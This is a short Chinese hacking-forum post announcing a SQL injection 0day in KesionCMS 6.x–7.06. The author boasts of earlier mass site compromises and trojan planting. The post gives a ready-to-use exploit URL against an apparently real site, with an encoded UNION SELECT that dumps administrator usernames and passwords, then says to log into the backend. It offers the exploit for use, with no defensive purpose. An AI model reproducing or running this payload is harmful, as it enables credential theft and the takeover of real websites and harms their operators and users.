科汛CMS最新注入0day,版本6.X-7.06


kesionCMS使用群体十分庞大。

记得几年前藏着一个科汛的HTTP头注入的0day日了好多站,那时候多喜欢挂驴。

搞了好多X图片站来挂。

这次暴的洞是T00LS的核心先发的。

直接暴管理员帐号和密码的EXP:


https://www.paytupian.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500


后台登陆,搞定!

返回列表
下一篇: